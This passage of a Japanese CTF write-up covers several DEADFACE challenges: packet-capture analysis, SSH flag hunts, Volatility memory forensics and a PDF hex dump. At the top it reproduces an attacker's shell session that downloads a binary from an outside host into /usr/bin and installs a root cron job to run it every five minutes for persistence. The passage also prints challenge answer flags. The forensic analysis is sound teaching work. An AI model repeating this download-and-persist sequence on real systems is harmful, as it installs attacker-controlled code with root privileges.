sudo -l
Matching Defaults entries for luciafer on dungeon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User luciafer may run the following commands on dungeon:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL


sudo wget -O /usr/bin/ll-connect.bin http://192.168.100.105/secret_decoder.bin
--2021-08-22 17:55:35--  http://192.168.100.105/secret_decoder.bin
Connecting to 192.168.100.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: '/usr/bin/ll-connect.bin'

     0K                                                       100% 57.2M=0s

2021-08-22 17:55:35 (57.2 MB/s) - '/usr/bin/ll-connect.bin' saved [194/194]

sudo chmod 755 /usr/bin/ll-connect.bin
sudo /bin/bash -c "echo '*/5 * * * * root /usr/bin/ll-connect.bin' > /etc/cron.d/da-ll-backup-job"★


cat /etc/cron.d/da-ll-backup-job
*/5 * * * * root /usr/bin/ll-connect.bin

cd /home/luciafer
ls -al 
total 21216
drwxr-xr-x 18 luciafer luciafer     4096 Aug 22 17:44 .
drwxr-xr-x  4 root     root         4096 Aug 21 20:29 ..
-rw-------  1 luciafer luciafer        0 Aug 21 20:43 .ICEauthority
-rw-------  1 luciafer luciafer      106 Aug 22 17:21 .Xauthority
-rw-------  1 luciafer luciafer     3186 Aug 22 17:21 .bash_history
-rw-r--r--  1 luciafer luciafer      220 Aug 21 20:29 .bash_logout
-rw-r--r--  1 luciafer luciafer     5349 Aug 21 20:29 .bashrc
-rw-r--r--  1 luciafer luciafer     3526 Aug 21 20:29 .bashrc.original
drwxr-xr-x 10 luciafer luciafer     4096 Aug 22 17:21 .cache
drwx------ 10 luciafer luciafer     4096 Aug 21 22:37 .config
-rw-r--r--  1 luciafer luciafer       55 Aug 21 21:07 .dmrc
-rw-r--r--  1 luciafer luciafer    11759 Aug 21 20:29 .face
lrwxrwxrwx  1 luciafer luciafer        5 Aug 21 20:29 .face.icon -> .face
drwx------  3 luciafer luciafer     4096 Aug 21 20:43 .gnupg
drwxr-xr-x  3 luciafer luciafer     4096 Aug 21 20:43 .local
drwx------  5 luciafer luciafer     4096 Aug 21 20:50 .mozilla
-rw-r--r--  1 luciafer luciafer      807 Aug 21 20:29 .profile
drwx------  2 luciafer luciafer     4096 Aug 21 20:56 .ssh
drwxr-xr-x  4 luciafer luciafer     4096 Aug 21 22:37 .wine
-rw-------  1 luciafer luciafer     9735 Aug 22 17:51 .xsession-errors
-rw-------  1 luciafer luciafer    10046 Aug 22 17:21 .xsession-errors.old
-rw-r--r--  1 luciafer luciafer    10605 Aug 21 20:29 .zshrc
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Desktop
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Documents
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Downloads
drwxr-xr-x  5 luciafer luciafer     4096 Aug 21 21:21 LLDUMP
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Music
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Pictures
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Public
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Templates
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Videos
-rw-r--r--  1 luciafer luciafer   578908 Aug 21 22:16 da-warning-message.jpg
-rw-r--r--  1 luciafer luciafer       65 Aug 21 22:29 da-warning.txt
-rw-------  1 luciafer luciafer 20867868 Aug 21 22:30 luciafer-packet-capture.pcapng
-rw-r--r--  1 root     root       105984 Aug 21 23:16 lytton-crypt-recovered.exe
-rwxr-xr-x  1 luciafer luciafer      194 Aug 22 17:43 secret_decoder.bin


echo DF7148BA7B69C3A27D85F78114E5A7C907A103CF0103B86C040983F593C6F016 > da-warning.txt
wget -O da-warning-message.jpg http://192.168.100.105/da-warning-message.jpg
--2021-08-22 17:57:03--  http://192.168.100.105/da-warning-message.jpg
Connecting to 192.168.100.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 578908 (565K) [image/jpeg]
Saving to: 'da-warning-message.jpg'

     0K .......... .......... .......... .......... ..........  8%  123M 0s
    50K .......... .......... .......... .......... .......... 17% 89.4M 0s
   100K .......... .......... .......... .......... .......... 26%  392M 0s
   150K .......... .......... .......... .......... .......... 35%  242M 0s
   200K .......... .......... .......... .......... .......... 44%  110M 0s
   250K .......... .......... .......... .......... .......... 53%  411M 0s
   300K .......... .......... .......... .......... .......... 61%  384M 0s
   350K .......... .......... .......... .......... .......... 70%  468M 0s
   400K .......... .......... .......... .......... .......... 79%  431M 0s
   450K .......... .......... .......... .......... .......... 88%  414M 0s
   500K .......... .......... .......... .......... .......... 97%  429M 0s
   550K .......... .....                                      100%  333M=0.002s

2021-08-22 17:57:03 (225 MB/s) - 'da-warning-message.jpg' saved [578908/578908]

★を付けた行で/etc/cron.dに5分ごとのジョブを書き込んでおり、これが永続化にあたる。該当するパケット番号を答える。

flag{160468}

A Warning (Traffic Analysis 150)

httpでフィルタリングする。No.160536で/da-warning-message.jpgをGETしている。このjpgをエクスポートする。
f:id:satou-y:20211021123957j:plain
画像にフラグが書いてあった。

flag{angels-fear-to-tread}

Blood Bash (Forensics 10)

$ ssh bl0ody_mary@bloodbash.deadface.io -p 22
The authenticity of host 'bloodbash.deadface.io (164.90.158.159)' can't be established.
ECDSA key fingerprint is SHA256:n2x0TCmZ4LxU0LLlQ0jkx/Uin/f3mSFLjKPR15n0zC0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'bloodbash.deadface.io,164.90.158.159' (ECDSA) to the list of known hosts.
bl0ody_mary@bloodbash.deadface.io's password: 
bl0ody_mary@d2c158885ddc:~$ ls -la
total 68
drwxr-xr-x 1 bl0ody_mary bl0ody_mary  4096 Sep 16 12:51  .
drwxr-xr-x 1 root        root         4096 Sep 14 19:15  ..
-rw------- 1 bl0ody_mary bl0ody_mary     1 Sep 16 14:44  .bash_history
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   220 Sep 14 19:15  .bash_logout
-rw-r--r-- 1 bl0ody_mary bl0ody_mary  3771 Sep 14 19:15  .bashrc
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   807 Sep 14 19:15  .profile
-rw-r--r-- 1 bl0ody_mary bl0ody_mary 12444 Sep 14 20:20 'De Monne Customer Portal.pdf'
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:16  Documents
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Downloads
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Music
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Pictures
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Videos
bl0ody_mary@d2c158885ddc:~$ pwd  
/home/bl0ody_mary
bl0ody_mary@d2c158885ddc:~$ find . -name flag1.txt
./Documents/flag1.txt
bl0ody_mary@d2c158885ddc:~$ cat ./Documents/flag1.txt
flag{cd134eb8fbd794d4065dcd7cfa7efa6f3ff111fe}
flag{cd134eb8fbd794d4065dcd7cfa7efa6f3ff111fe}

Blood Bash 2 (Forensics 15)

$ ssh bl0ody_mary@bloodbash.deadface.io -p 22
bl0ody_mary@bloodbash.deadface.io's password: 
bl0ody_mary@14c2a89a26e9:~$ ls -lRa
.:
total 68
drwxr-xr-x 1 bl0ody_mary bl0ody_mary  4096 Sep 16 12:51  .
drwxr-xr-x 1 root        root         4096 Sep 14 19:15  ..
-rw------- 1 bl0ody_mary bl0ody_mary     1 Sep 16 14:44  .bash_history
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   220 Sep 14 19:15  .bash_logout
-rw-r--r-- 1 bl0ody_mary bl0ody_mary  3771 Sep 14 19:15  .bashrc
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   807 Sep 14 19:15  .profile
-rw-r--r-- 1 bl0ody_mary bl0ody_mary 12444 Sep 14 20:20 'De Monne Customer Portal.pdf'
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:16  Documents
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Downloads
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Music
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Pictures
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Videos

./Documents:
total 20
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:16 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   47 Sep 14 19:16 .demonne_info.txt
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   47 Sep 14 19:16 flag1.txt

./Downloads:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Music:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Pictures:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Videos:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..
$ cat ./Documents/.demonne_info.txt
flag{a856b162978fe563537c6890cb184c48fc2a018a}
flag{a856b162978fe563537c6890cb184c48fc2a018a}

Window Pains (Forensics 30)

メモリダンプからOS, bit version、イメージの日付を答える問題。

$ volatility -f physmemraw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_19041
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/physmemraw)
                      PAE type : No PAE
                           DTB : 0x1aa000L
                          KDBG : 0xf8005e600b20L
          Number of Processors : 4
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8005ba60000L
                KPCR for CPU 1 : 0xffff82804f9c0000L
                KPCR for CPU 2 : 0xffff82804f5e8000L
                KPCR for CPU 3 : 0xffff82804f7ca000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-09-07 14:57:44 UTC+0000
     Image local date and time : 2021-09-07 07:57:44 -0700
flag{Windows10_64_20210907145744}

Window Pains 2 (Forensics 50)

メモリダンプからコンピュータ名を答える問題。

$ volatility -f physmemraw --profile=Win10x64_19041 envars | grep COMPUTERNAME
Volatility Foundation Volatility Framework 2.6.1
     568 wininit.exe          0x000002760e625ed0 COMPUTERNAME                   DESKTOP-IT8QNRI
                :
                :
flag{DESKTOP-IT8QNRI}

Blood Bash 4 (Forensics 200)

bl0ody_mary@8aa5d57a62dd:~$ xxd De\ Monne\ Customer\ Portal.pdf 
00000000: 2550 4446 2d31 2e36 0d25 e2e3 cfd3 0d0a  %PDF-1.6.%......
00000010: 3131 2030 206f 626a 0d3c 3c2f 4c69 6e65  11 0 obj.<</Line
00000020: 6172 697a 6564 2031 2f4c 2031 3234 3434  arized 1/L 12444
00000030: 2f4f 2031 332f 4520 3832 3832 2f4e 2031  /O 13/E 8282/N 1
00000040: 2f54 2031 3231 3431 2f48 205b 2034 3338  /T 12141/H [ 438
00000050: 2031 3435 5d3e 3e0d 656e 646f 626a 0d20   145]>>.endobj. 
00000060: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000070: 2020 0d0a 3136 2030 206f 626a 0d3c 3c2f    ..16 0 obj.<</
00000080: 4465 636f 6465 5061 726d 733c 3c2f 436f  DecodeParms<</Co
00000090: 6c75 6d6e 7320 332f 5072 6564 6963 746f  lumns 3/Predicto
000000a0: 7220 3132 3e3e 2f46 696c 7465 722f 466c  r 12>>/Filter/Fl
000000b0: 6174 6544 6563 6f64 652f 4944 5b3c 3032  ateDecode/ID[<02
000000c0: 4633 3538 3939 3343 3144 3134 3445 3843  F358993C1D144E8C
000000d0: 4636 4432 4632 4132 3739 4143 3446 3e3c  F6D2F2A279AC4F><
000000e0: 3145 4232 4642 3139 3239 3144 4344 3444  1EB2FB19291DCD4D
000000f0: 3938 3339 3737 3135 3943 3941 3735 3936  983977159C9A7596
00000100: 3e5d 2f49 6e64 6578 5b31 3120 375d 2f49  >]/Index[11 7]/I
00000110: 6e66 6f20 3130 2030 2052 2f4c 656e 6774  nfo 10 0 R/Lengt
00000120: 6820 3336 2f50 7265 7620 3132 3134 322f  h 36/Prev 12142/
00000130: 526f 6f74 2031 3220 3020 522f 5369 7a65  Root 12 0 R/Size
00000140: 2031 382f 5479 7065 2f58 5265 662f 575b   18/Type/XRef/W[
00000150: 3120 3220 305d 3e3e 7374 7265 616d 0d0a  1 2 0]>>stream..
00000160: 68de 6262 6410 6062 6032 6762 60f0 6162  h.bbd.`b`2gb`.ab
00000170: 60dc 05a4 4b98 18fe 6e06 b29d 0002 0c00  `...K...n.......
00000180: 23a7 03c7 0d0a 656e 6473 7472 6561 6d0d  #.....endstream.
00000190: 656e 646f 626a 0d73 7461 7274 7872 6566  endobj.startxref
000001a0: 0d0a 300d 0a25 2545 4f46 0d0a 2020 2020  ..0..%%EOF..    
000001b0: 2020 2020 0d0a 3137 2030 206f 626a 0d3c      ..17 0 obj.<
000001c0: 3c2f 4669 6c74 6572 2f46 6c61 7465 4465  </Filter/FlateDe
000001d0: 636f 6465 2f49 2038 322f 4c65 6e67 7468  code/I 82/Length
000001e0: 2036 312f 4f20 3636 2f53 2033 363e 3e73   61/O 66/S 36>>s
000001f0: 7472 6561 6d0d 0a68 de62 6060 6066 6060  tream..h.b```f``
00000200: 6262 0002 d9e3 0c98 8085 8103 89c7 0cc5  bb..............
00000210: 0c0c 250c bc4c 060c 165e 2036 2303 8342  ..%..L...^ 6#..B
00000220: 3484 66b8 03d6 c3a0 370d cabf 0910 6000  4.f.....7.....`.
00000230: a33c 052e 0d0a 656e 6473 7472 6561 6d0d  .<....endstream.
00000240: 656e 646f 626a 0d31 3220 3020 6f62 6a0d  endobj.12 0 obj.
00000250: 3c3c 2f4d 6574 6164 6174 6120 3220 3020  <</Metadata 2 0 
00000260: 522f 4f75 746c 696e 6573 2036 2030 2052  R/Outlines 6 0 R
00000270: 2f50 6167 6573 2039 2030 2052 2f54 7970  /Pages 9 0 R/Typ
00000280: 652f 4361 7461 6c6f 673e 3e0d 656e 646f  e/Catalog>>.endo
00000290: 626a 0d31 3320 3020 6f62 6a0d 3c3c 2f43  bj.13 0 obj.<</C
000002a0: 6f6e 7465 6e74 7320 3134 2030 2052 2f43  ontents 14 0 R/C
000002b0: 726f 7042 6f78 5b30 2e30 2030 2e30 2036  ropBox[0.0 0.0 6
000002c0: 3132 2e30 2037 3932 2e30 5d2f 4d65 6469  12.0 792.0]/Medi
000002d0: 6142 6f78 5b30 2e30 2030 2e30 2036 3132  aBox[0.0 0.0 612
000002e0: 2e30 2037 3932 2e30 5d2f 5061 7265 6e74  .0 792.0]/Parent
000002f0: 2039 2030 2052 2f52 6573 6f75 7263 6573   9 0 R/Resources
00000300: 3c3c 2f50 726f 6353 6574 5b2f 5044 462f  <</ProcSet[/PDF/
00000310: 496d 6167 6543 5d2f 584f 626a 6563 743c  ImageC]/XObject<
00000320: 3c2f 496d 3020 3135 2030 2052 3e3e 3e3e  </Im0 15 0 R>>>>
00000330: 2f52 6f74 6174 6520 302f 5479 7065 2f50  /Rotate 0/Type/P
00000340: 6167 653e 3e0d 656e 646f 626a 0d31 3420  age>>.endobj.14 
00000350: 3020 6f62 6a0d 3c3c 2f4c 656e 6774 6820  0 obj.<</Length 
00000360: 3636 3e3e 7374 7265 616d 0d0a 710a 3237  66>>stream..q.27
00000370: 332e 3032 3030 3139 3520 3020 3020 3334  3.0200195 0 0 34
00000380: 2e31 3939 3939 3639 2031 3631 2e37 3730  .1999969 161.770
00000390: 3639 3039 2037 3234 2e30 3937 3737 3833  6909 724.0977783
000003a0: 2063 6d0a 2f49 6d30 2044 6f0a 510a 0d0a   cm./Im0 Do.Q...
000003b0: 656e 6473 7472 6561 6d0d 656e 646f 626a  endstream.endobj
000003c0: 0d31 3520 3020 6f62 6a0d 3c3c 2f42 6974  .15 0 obj.<</Bit
000003d0: 7350 6572 436f 6d70 6f6e 656e 7420 382f  sPerComponent 8/
000003e0: 436f 6c6f 7253 7061 6365 2f44 6576 6963  ColorSpace/Devic
000003f0: 6552 4742 2f46 696c 7465 722f 4443 5444  eRGB/Filter/DCTD
00000400: 6563 6f64 652f 4865 6967 6874 2035 372f  ecode/Height 57/
00000410: 4c65 6e67 7468 2037 3135 382f 4e61 6d65  Length 7158/Name
00000420: 2f58 2f53 7562 7479 7065 2f49 6d61 6765  /X/Subtype/Image
00000430: 2f54 7970 652f 584f 626a 6563 742f 5769  /Type/XObject/Wi
00000440: 6474 6820 3435 353e 3e73 7472 6561 6d0d  dth 455>>stream.
00000450: 0aff d8ff ee00 0e41 646f 6265 0064 0000  .......Adobe.d..
00000460: 0000 01ff db00 c500 0c08 0808 0808 0c08  ................
00000470: 080c 100b 0b0b 0c0f 0e0d 0d0e 1412 0e0e  ................
00000480: 1313 1217 1412 1414 1a1b 1714 141b 1e1e  ................
00000490: 271b 1424 2727 2727 2432 3535 3532 3b3b  '..$''''$25552;;
000004a0: 3b3b 3b3b 3b3b 3b3b 010d 0a0a 0c0a 0c0e  ;;;;;;;;........
000004b0: 0c0c 0e11 0e0e 0c0d 1114 140f 0f11 1410  ................
000004c0: 1118 1110 1414 1314 1515 1413 1415 1515  ................
000004d0: 1515 1515 1a1a 1a1a 1a1a 1e1e 1e1e 1e23  ...............#
000004e0: 2323 2327 2727 2c2c 2c02 0d0a 0a0c 0a0c  ###''',,,.......
000004f0: 0e0c 0c0e 110e 0e0c 0d11 1414 0f0f 1114  ................
00000500: 1011 1811 1014 1413 1415 1514 1314 1515  ................
00000510: 1515 1515 151a 1a1a 1a1a 1a1e 1e1e 1e1e  ................
00000520: 2323 2323 2727 272c 2c2c ffdd 0004 001d  ####''',,,......
00000530: ffc0 0011 0800 3901 c703 0022 0001 1101  ......9...."....
00000540: 0211 02ff c401 a200 0100 0300 0104 0300  ................
00000550: 0000 0000 0000 0000 0005 0607 0201 0304  ................
00000560: 0809 0a0b 0101 0001 0109 0000 0000 0000  ................
00000570: 0000 0000 0000 0102 0304 0506 0708 090a  ................
00000580: 0b10 0000 0303 0303 040c 592d 0000 0000  ..........Y-....
00000590: 0000 0102 0300 0411 0506 1207 1321 1431  .............!.1
000005a0: 3241 1516 2223 3642 5161 7581 93b2 0809  2A.."#6BQau.....
000005b0: 0a17 1819 1a24 2526 2728 292a 3334 3537  .....$%&'()*3457
000005c0: 3839 3a43 4445 4647 4849 4a52 5354 5556  89:CDEFGHIJRSTUV
000005d0: 5758 595a 6263 6465 6667 6869 6a71 7273  WXYZbcdefghijqrs
000005e0: 7476 7778 797a 8283 8485 8687 8889 8a91  tvwxyz..........
000005f0: 9294 9596 9798 999a a1a2 a3a4 a5a6 a7a8  ................
00000600: a9aa b1b3 b4b5 b6b7 b8b9 bac1 c2c3 c4c5  ................
00000610: c6c7 c8c9 cad1 d2d3 d4d5 d6d7 d8d9 dae1  ................
00000620: e2e3 e4e5 e6e7 e8e9 eaf0 f1f2 f3f4 f5f6  ................
00000630: f7f8 f9fa 1100 0001 0204 0407 731d 0000  ............s...
00000640: 0000 0000 0001 0002 1121 3141 0312 5161  .........!1A..Qa
00000650: 1342 4371 81d1 f004 0506 0708 090a 1415  .BCq............
00000660: 1617 1819 1a22 2324 2526 2728 292a 3233  ....."#$%&'()*23
00000670: 3435 3637 3839 3a44 4546 4748 494a 5253  456789:DEFGHIJRS
00000680: 5455 5657 5859 5a62 6364 6566 6768 696a  TUVWXYZbcdefghij
00000690: 7273 7475 7677 7879 7a82 8384 8586 8788  rstuvwxyz.......
000006a0: 898a 9192 9394 9596 9798 999a a1a2 a3a4  ................
000006b0: a5a6 a7a8 a9aa b1b2 b3b4 b5b6 b7b8 b9ba  ................
000006c0: c1c2 c3c4 c5c6 c7c8 c9f1 cad2 d3d4 d5d6  ................
000006d0: d7d8 d9da e1e2 e3e4 e5e6 e7e8 e9ea f2f3  ................
000006e0: f4f5 f6f7 f8f9 faff da00 0c03 0000 0111  ................
000006f0: 0211 003f 00d5 58c6 3084 6376 d778 7775  ...?..X.0.cv.xwu
00000700: 48cb bd2a 4452 25c9 450c 0420 6fe2 2200  H..*DR%.E.. o.".
00000710: 0de2 ba4b b224 a063 91c2 5075 7a32 6413  ...K.$.c..Puz2d.
00000720: 9ca8 ae92 a252 85b9 8689 8601 8767 3885  .....R.......g8.
00000730: e731 a2af 6c9a db0c c9fd 3a77 f8a3 4a5b  .1..l.....:w..J[
00000740: d906 10ba b18c 6108 c631 8423 18dc 4e72  ......a..1.#..Nr
00000750: 2643 28a1 8084 2144 c631 8605 000b 2222  &C(...!D.1....""
00000760: 3846 2842 e4c6 a739 5552 6dca 32ca 522b  8F(B...9URm.2.R+
00000770: 826f 6ba8 f0b8 229a e54c 8540 4470 6be9  .ok..."..L.@Dpk.
00000780: 529e 8efe 58e1 9ae2 c580 5612 2e20 b811  R...X.....V.. ..
00000790: 8dc5 4513 4933 2aa9 8084 2144 c739 840a  ..E.I3*...!D.9..
000007a0: 5280 5911 111b 0000 0dda 737f 7194 51b5  R.Y.......s.q.Q.
000007b0: 127b c24f 68d2 12d7 1039 1625 20b7 0894  .{.Oh....9.% ...
000007c0: 4423 6584 2efb 18c6 108c 6318 4231 8c61  D#e.......c.B1.a
000007d0: 08c6 3184 2318 c610 8c63 1842 318c 6108  ..1.#....c.B1.a.
000007e0: c631 8423 18dc 5451 3493 32aa 9808 4214  .1.#..TQ4.2...B.
000007f0: 4c73 9840 a528 0591 1111 b000 00c2 1726  Ls.@.(.........&
00000800: 3761 cdfd c651 46d4 49ef 093d a348 4b5c  7a...QF.I..=.HK\
00000810: 40e4 5894 82dc 2251 108d 96ef b084 6318  @.X..."Q......c.
00000820: c211 8c63 0846 318c 2118 c630 8463 18c2  ...c.F1.!..0.c..
00000830: 118c 6308 4631 8c21 18c6 3084 6318 c211  ..c.F1.!..0.c...
00000840: 8d4b c9d8 9b09 caa7 925e c8f4 ea74 973a  .K.......^...t.:
00000850: 0759 54d3 ac94 c430 9044 44aa 9cd0 885b  .YT....0.DD....[
00000860: d16b 9808 1800 c518 8084 4042 c830 1300  .k........@B.0..
00000870: 1050 5722 8220 b82c 5d58 c630 85ff d0d5  .PW". .,]X.0....
00000880: 58c6 839c eed3 b5e5 3770 9a8f 6ece 8729  X.......7p..n..)
00000890: 8f6a 05e8 2901 8040 28d1 bf4a ddc7 08c1  .j..)..@(..J....
000008a0: 4885 4b95 1cc6 7d55 2579 0a50 5540 92e4  H.K...}U%y.PU@..
000008b0: 8429 8a04 1128 18c0 04a5 6d6c 2265 2c8d  .)...(....ml"e,.
000008c0: bc02 00d7 3926 644d 8909 655e 24a7 2ac2  ....9&dM..e^$.*.
000008d0: 8ba0 6414 1aea ea45 3308 0896 fb50 d0b8  ..d....E3....P..
000008e0: 85b3 6692 239c fa3c f995 9070 7e74 4e58  ..f.#..<...p~tNX
000008f0: 2242 2f8b a858 bb9c b14a c142 b06c 2860  "B/..X...J.B.l(`
00000900: a0da 5cd8 769d cec5 78bd aded d9ec c612  ..\.v...x.......
00000910: 5a7b 4a14 40a0 14a9 d2bf 295b d885 bb0d  Z{J.@.....)[....
00000920: 08c0 d6e6 0888 b513 8440 5dc0 4870 c667  .........@].Hp.g
00000930: 3638 0001 a200 083c 9506 aa73 4e6f 4812  68.....<...sNoH.
00000940: 4b93 d490 e657 5554 7d04 ce62 9943 44b4  K....WUT}..b.CD.
00000950: 0e68 40c7 305b 941b 594f 3ccb c043 c86c  .h@.0[..YO<..C.l
00000960: f6ad 7a00 b862 443c ad46 d093 cf32 f010  ..z..bD<.F...2..
00000970: f21a 4255 1b88 3bc9 843a 5632 dc1d e8bc  ..BU..;..:V2....
00000980: 096e 5f92 26eb b11f 2595 ed32 2a28 0914  .n_.&...%..2*(..
00000990: f414 5626 1013 0041 329c 6d8a 374d e2c9  ..V&...A2.m.7M..
000009a0: 33d2 6b4b 6b03 bc9b 28a4 aac6 b8a4 6a68  3.kKk...(.....jh
000009b0: a86c 314a a148 2236 2e81 bc69 e72f cd39  .l1J.H"6...i./.9
000009c0: 19d9 224e 6453 7c13 889d 0753 2247 a504  .."NdS|....S"G..
000009d0: 42f9 1381 4f7c 96de 1111 06cc a784 af34  B...O|.........4
000009e0: 9fdc 48f3 2148 af52 43fa 2b26 745e 4a89  ..H.!H.RC.+&t^J.
000009f0: 1d51 12c4 4440 6b6a 4006 d840 4023 876a  .Q..D@kj@..@@#.j
00000a00: 405a a608 8024 b2cf 2994 a0f0 90aa f3bb  @Z...$..).......
00000a10: 2dc0 4400 2236 001a bca5 50e6 624f 9680  -.D."6....P.bO..
00000a20: f2a2 55ea 7404 40aa 9920 1b6b 2a01 0530  ..U.t.@.. .k*..0
00000a30: 0c3d 2834 5cf3 965e 8953 517f 0341 77e7  .=(4\..^.SQ..Aw.
00000a40: 3742 2860 b19f 8025 72da 16e0 220d ca66  7B(`...%r..."..f
00000a50: 4c99 b613 55c4 ef92 7bbb dacf 8ea4 5d65  L...U...{.....]e
00000a60: 964c aa2b 158a 0780 1840 44a0 0030 0843  .L.+.....@D..0.C
00000a70: 0b6e d520 2027 b461 9c06 8b71 1447 2480  .n.  '.a...q.G$.
00000a80: 1400 8081 82b9 e08b b078 4ac4 e538 a469  .........xJ..8.i
00000a90: 4652 7892 1c9e 4167 b742 8197 4ca5 5000  FRx...Ag.B..L.P.
00000aa0: a030 08d2 1281 06e4 16c2 2ddb 9d68 a8f1  .0........-..h..
00000ab0: 3625 5412 b99e 4f79 02c2 de34 0c30 6a25  6%T...Oy...4.0j%
00000ac0: 4e1c 8927 4fc9 7dc1 3398 e9bb 2474 9331  N..'O.}.3...$t.1
00000ad0: c44c 6a05 5480 5011 1118 c000 01a7 e7fb  .Lj.T.P.........
00000ae0: 84ee 7a48 eac9 0f40 5925 3743 0beb 9a67  ..zH...@Y%7C...g
00000af0: 2a0f 6ad1 1318 f414 1414 8449 00b7 c50b  *.j........I....
00000b00: 507a 02c3 3469 a30c 4511 5011 4531 6c93  Pz..4i..E.P.E1l.
00000b10: 7293 1106 21c1 4a1e 0080 2a28 2039 34db  r...!.J...*( 94.
00000b20: 170a 911d 13cc d48a 9140 a723 d3c1 5510  .........@.#..U.
00000b30: 0001 31a9 5201 1c28 d110 06b7 be3e 3a49  ..1.R..(.....>:I
00000b40: eec7 7c7e 588e e824 113a 8a08 1480 1bf8  ..|~X..$.:......
00000b50: b56a a66b 48ab 4d64 8644 4547 74ca a9ca  .j.kH.Md.DEGt...
00000b60: b916 302a a57a f9a4 2260 2940 d101 0808  ..0*.z.."`)@....
00000b70: 1437 e068 1aac 1949 4253 9bf3 6c4e 29a0  .7.h...IBS..lN).
00000b80: faf6 02a8 8614 c722 251c 501c cd68 c444  ......."%.P..h.D
00000b90: 4f34 d054 e134 0115 1140 1376 5ca9 3106  O4.T.4...@.v\.1.
00000ba0: 5111 50d6 6114 1dc5 2775 8a75 ea7c 4d59  Q.P.a...'u.u.|MY
00000bb0: 6e4d 945c 24c9 408b 3c0b 83d5 14cc 5552  nM.\$.@.<.....UR
00000bc0: 1341 3388 d1ae 1080 6b01 7516 f0aa 3980  .A3.....k.u...9.
00000bd0: 80f0 bd7f 2136 f367 0cc9 9b44 9b8f 6473  ....!6.g...D..ds
00000be0: 7045 d167 5745 1441 e502 011e 0a64 c826  pE.gWE.A.....d.&
00000bf0: 0113 840e 68c2 0311 b2d1 352e 7917 2a9f  ....h.....5.y.*.
00000c00: bdbe 1422 2eeb 3e2a 0185 1226 5307 90d4  ..."..>*...&S...
00000c10: 8081 ae28 a693 08d4 5d80 e7c9 1488 08b8  ...(....].......
00000c20: 40d5 8839 3134 ad12 c4f3 9b12 02c0 ed2a  @..914.........*
00000c30: bfa6 8ac3 6e91 4145 942d d852 2a65 3897  ....n.AE.-.R*e8.
00000c40: 1706 f2e4 8976 4897 9dc5 e648 7a4d e930  .....vH....HzM.0
00000c50: 801a 8088 18a2 36c0 6288 018a 3bf8 0363  ......6.b...;..c
00000c60: f33e 599a eec9 3cca 138e 497b 96a5 17b7  .>Y...<...I{....
00000c70: 839c eb0b ba4f 6800 08c6 c571 400a 4222  .....Oh....q@.B"
00000c80: 2223 0694 9b6f ae43 5467 67a9 b327 bd49  "#...o.CTgg..'.I
00000c90: d27b ea0a 24f6 82c9 5653 a405 39e2 5029  .{..$...VS..9.P)
00000ca0: 8e50 2c4a 51b7 b78b 4802 6002 a882 a0a0  .P,JQ...H.`.....
00000cb0: 0a08 a09e 4916 a502 2908 8286 8aea 8800  ....I...).......
00000cc0: a1ec a051 b3e5 1791 aa04 a928 ba0c 1592  ...Q.......(....
00000cd0: 9174 7e00 80c4 4120 7601 b61b 10a5 1c53  .t~...A v......S
00000ce0: 49d5 4dee f605 1d51 7338 da77 1924 6545  I.M....Qs8.w.$eE
00000cf0: 0603 0107 8326 9a61 6f6f 0874 6d20 0e69  .....&.aoo.tm .i
